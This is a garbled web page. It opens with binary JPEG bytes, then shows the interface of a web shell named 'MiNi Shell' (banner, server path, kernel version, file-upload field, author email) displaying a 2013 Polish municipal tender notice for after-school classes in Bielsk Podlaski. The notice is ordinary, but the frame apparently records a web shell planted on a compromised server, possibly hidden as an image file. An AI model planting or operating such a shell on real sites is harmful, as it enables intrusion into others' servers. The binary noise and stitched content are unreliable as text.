JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131014/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131014/213479-N-2013.html

<p class="kh_header"><b>Bielsk Podlaski: Zajęcia pozalekcyjne w ramach projektu  pod nazwą Bielskie Gimnazja- dobry start i pewna przyszłość współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego POKL</b><br>
<b>Numer ogłoszenia: 213479 - 2013; data zamieszczenia: 14.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Bielsk Podlaski , ul. Kopernika 1, 17-100 Bielsk Podlaski, woj. podlaskie, tel. 0-85 73 18 100, faks 0-85 73 18 150.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bielsk-podlaski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zajęcia pozalekcyjne w ramach projektu  pod nazwą Bielskie Gimnazja- dobry start i pewna przyszłość współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego POKL.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa polegająca na prowadzeniu zajęć pozalekcyjnych dla uczniów klas I - III w trzech gimnazjach w ramach projektu dofinansowanego ze środków Unii Europejskiej pod nazwą: Bielskie Gimnazja- dobry start i pewna przyszłość, w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego ze środków Europejskiego Funduszu Społecznego, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych.
Przedmiot zamówienia obejmuje:
1.Przygotowanie programu i przeprowadzenie w roku szkolnym 2013/14 wymienionych w pkt. a-c pozalekcyjnych zajęć dydaktycznych dla uczniów i uczennic Gimnazjum Nr 1 im. Niepodległości Polski w Bielsku Podlaskim, Gimnazjum Nr 2 z Zespołu Szkół im. A. Mickiewicza w Bielsku Podlaskim i Gimnazjum Nr 3 z Zespołu Szkół z DNJB im. J. Kostycewicza w Bielsku Podlaskim:
a)wyrównujących wiedzę z matematyki, fizyki, geografii, chemii, języka ojczystego i języka angielskiego, zajęcia prowadzone w grupach 8 - osobowych;
b)rozwijających wiedzę z matematyki, biologii, geografii, chemii, języka ojczystego i języka angielskiego, zajęcia prowadzone w grupach 8 - osobowych;
c)rozwijających zainteresowania i świadomość kulturalną, w tym: sportowe, fotograficzne, plastyczne, teatralne i dziennikarskie, zajęcia prowadzone w grupach 12 - osobowych;
2.Przygotowanie programu i przeprowadzenie zajęć z zakresu rozwijania umiejętności społecznych realizowanych w 12 -osobowych grupach, w formie 4 godzinnych warsztatów obejmujących następującą tematykę, w zależności od potrzeb szkoły:
-Komunikacja interpersonalna,
-Rozwiązywanie konfliktów,
-Wzmacnianie poczucia własnej wartości,
-Radzenie ze stresem,
-Budowanie motywacji do nauki.
3.Przygotowanie programu i przeprowadzenie zajęć z zakresu doradztwa zawodowego, realizowanych w 12 - osobowych grupach, w formie 4 godzinnych warsztatów obejmujących tematykę samopoznania i planowania kariery zawodowej. 
4.Przeprowadzenie 2 godzinnych spotkań doradczych, podczas których doradca wypracuje z uczniem Indywidualny Plan Działań Edukacyjno - Zawodowych (Portfolio IPDE-Z) obejmujący diagnozę potencjału ucznia, określenie celów edukacyjno- zawodowych, plan działania oraz rekomendację doradcy zawodowego. 
5.Zamawiający przewiduje możliwość składania ofert częściowych na prowadzenie zajęć z danego przedmiotu i w danej szkole. Szczegółowy opis przedmiotu zamówienia z podziałem na części oraz wymiar godzinowy przedstawia tabela (w siwz)
-Zajęcia wyrównujące wiedzę
część 1-9,Matematyka, liczba godzin 24	Klasa II,grup-2,1,1,1
		                                  20 	Klasa III,grup -2,1,2
część 10,11Fizyka,liczba godzin	24	Klasa II x,x,	1
		                                20	Klasa IIIx,1.x
część12,Geografia, liczba godzin 	24	Klasa IIx,1,x
część13Chemia, liczba godzin 	20	Klasa IIIx,1,	x
część14,15,16,Język ojczysty	        24	klasa II1,1,1
część17,Język rosyjski liczba godzin	24	Klasa IIx,1,x
część18-20	Język angielski,liczba godzin	24	Klasa II1,x,1
		                               20	Klasa III1,x,x
-Zajęcia rozwijające wiedzę
część21-23,Matematyka,liczba godzin	24	Klasa II1,1,x
		                                        20	Klasa IIIx,1,x
część24,25	Biologia,liczba godzin	24	Klasa IIx,x,1
		                                20	Klasa III1,x,x
część26,Chemia,liczba godzin   	20	Klasa IIIx,x,1
część27,Geografia, liczba godzin	20	Klasa IIIx,x,1
część28-30	Język ojczysty, liczba godzin	20	Klasa III1,1,1
część31-34	Język angielski, liczba godzin	24	Klasa II1,x,x
		                                        20	Klasa III1,1,1
-Zajęcia rozwijające zainteresowania i świadomość kulturalną
część35-37	Sportowe, liczba godzin	30 Klasa II i III1,1,1
część38-41	Fotograficzne, liczba godzin	35	Klasa II i III	1,1,2
część42-43	Plastyczne, liczba godzin	36	Klasa II i III	1x1
część44,45	Teatralne, liczba godzin 	48	Klasa II i III	1	1,x
część46,Dziennikarskie, liczba godzin 	45	Klasa II i III	x,1x
-Zajęcia rozwijające umiejętności społeczne
część47-53	Zajęcia warsztatowe     	4	Klasy II i III	3,2,2
-Doradztwo edukacyjno - zawodowe
część54, Zajęcia warsztatowe	       4	Klasa III 4,4,4
część55a, Indywidualne spotkania doradcze	2 h/ osoba	Klasa III48 osób,x	,x
część55b	Indywidualne spotkania doradcze	2h/osoba	Klasa IIIx,48 osób,	x
część 55cIndywidualne spotkania doradcze	2h/osoba	KlasaIII x,x,	48 osób
6.Program zajęć rozwijających wiedzę z poszczególnych przedmiotów powinien wykraczać poza treści programowe realizowane w trakcie zajęć lekcyjnych w szkołach, uwzględniać potrzeby uczniów i uczennic szczególnie uzdolnionych.
7.Program zajęć wyrównujących wiedzę z poszczególnych przedmiotów powinien uzupełniać braki w wiedzy uczniów i uczennic pod kątem egzaminu gimnazjalnego. 
8.Zakres programowy konsultacji powinien być dostosowany do indywidualnych potrzeb i możliwości uczniów i uczennic.
9.Programy zajęć rozwijających zainteresowania i świadomość kulturalną powinny uwzględniać potrzeby uczniów i uczennic oraz końcowy rezultat, tj.:
a.zajęcia sportowe - organizacja międzyszkolnego turnieju sportowego,
b.zajęcia fotograficzne - wystawa fotografii,
c.zajęcia plastyczne - wystawa prac plastycznych,
d.zajęcia teatralne - wystawienie spektaklu.
10.Program warsztatów umiejętności społecznych oraz warsztatów z doradztwa zawodowego powinien uwzględniać aktywne metody pracy, symulacje, ćwiczenia oraz prezentacje multimedialne.
11.Termin realizacji zamówienia ustala się od dnia podpisania umowy do dnia 31.05.2014 r. zgodnie z założonym harmonogramem projektu (zajęcia wyrównujące wiedzę i zajęcia rozwijające wiedzę). 
12.Termin realizacji zamówienia ustala się od dnia podpisania umowy do dnia do dnia 30.06.2014 r. zgodnie z założonym harmonogramem projektu (zajęcia rozwijające zainteresowania i świadomość kulturalną, zajęcia rozwijające umiejętności społeczne, doradztwo edukacyjno - zawodowe, w tym zajęcia warsztatowe i indywidualne spotkania doradcze).
13.Zajęcia będące przedmiotem zamówienia będą prowadzone w godzinach popołudniowych od poniedziałku do piątku, zgodnie z założeniami projektu, wyborem grupy docelowej oraz specyfiką funkcjonowania szkoły.
14.Wykonawca zostanie zatrudniony na podstawie umowy cywilno - prawnej, tj. umowy zlecenia.
15.Prowadzący dodatkowe zajęcia pozalekcyjne (wyrównujące, rozwijające) oraz grupowe warsztaty z doradztwa zawodowego i indywidualne spotkania będzie odpowiadał za przygotowanie, realizację i dokumentację zajęć określoną przez Zamawiającego.
16.Szczegółowe obowiązki Wykonawcy ujęte zostały w projekcie umowy.
17.Wymagania podstawowe wobec wykonawcy części 1-46:
a)Wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym oraz dodatkowo kwalifikacje do realizacji poszczególnych części zamówienia,
b)posiadanie pełnej zdolności czynności prawnych.
18.Wymagania podstawowe wobec wykonawcy części 47-53:
a)wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym oraz dodatkowo kwalifikacje do prowadzenia zajęć psychoedukacyjnych i/lub kwalifikacje trenera z zakresu umiejętności społecznych,
b)posiadanie pełnej zdolności czynności prawnych.
19.Wymagania podstawowe wobec wykonawcy części 54-55a,b,c:
a)wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym oraz dodatkowo kwalifikacje doradcy zawodowego,
b)posiadanie pełnej zdolności czynności prawnych..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielania zamówień uzupełniających w wysokości do 50% zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.41.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 55.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca  w celu potwierdzenia dysponowania osobami zdolnymi do wykonania zamówienia musi wykazać, że dysponuje zespołem zdolnym do realizacji zamówienia, a w szczególności 
1.osobą posiadającą wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym  oraz dodatkowo wymagane kwalifikacje do realizacji poszczególnych części zamówienia (wg załącznika Nr 3 do SIWZ)  : 
- część 1-9,21-23- kwalifikacje do nauczania matematyki, 
- część 10,11 - kwalifikacje do prowadzenia zajęć z fizyki,
- część 12, 27 - kwalifikacje do prowadzenia zajęć z geografii,
- część 13, 26- kwalifikacje do prowadzenia zajęć z chemii,
- część 14-16, 28-30- kwalifikacje do prowadzenia zajęć z języka ojczystego,
- część 17 - kwalifikacje do prowadzenia zajęć z języka rosyjskiego,
- część 18-20, 31-34 -kwalifikacje do prowadzenia zajęć z języka angielskiego,
- część 24,25 - kwalifikacje do prowadzenia zajęć z biologii,
- część 35-37- kwalifikacje do prowadzenia zajęć sportowych,
- część 38-41- kwalifikacje do prowadzenia zajęć fotograficznych,
- część 42,43- kwalifikacje do prowadzenia zajęć plastycznych,
- część 44,45- kwalifikacje do prowadzenia zajęć teatralnych,
- część 46- kwalifikacje do prowadzenia zajęć dziennikarskich,
- część 47-53 -kwalifikacje do prowadzenia zajęć psychoedukacyjnych i/lub kwalifikacje trenera z zakresu umiejętności społecznych,
- część 54-55 a,b,c -kwalifikacje doradcy zawodowego
2.posiadania pełnej zdolności do czynności prawnych (wg oświadczenia, dla części 1-55a,b,c)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Formularz ofertowy wg załącznika Nr 1 do SIWZ
2) Oświadczenie, o posiadaniu pełnej zdolności do czynności prawnych (Załącznik Nr 
3) Pełnomocnictwo - w przypadku, gdy oferta została podpisana przez pełnomocnika lub gdy została złożona przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z  art. 23 ustawy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się zmianę postanowień zawartej umowy, w stosunku do treści oferty, w w przypadku zmiany w obowiązujących przepisach prawa w zakresie mającym wpływ na realizację umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bielsk-podlaski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację Istotnych Warunków Zamówienia można odebrać również osobiście w siedzibie Zamawiającego w pok.  Nr  111..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.10.2013 godzina 10:00, miejsce: Biuro podawcze Urzędu Miasta Bielsk Podlaski, ul. Kopernika 1, 17-100 Bielsk Podlaski.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Postępowanie prowadzone w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego ze środków Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com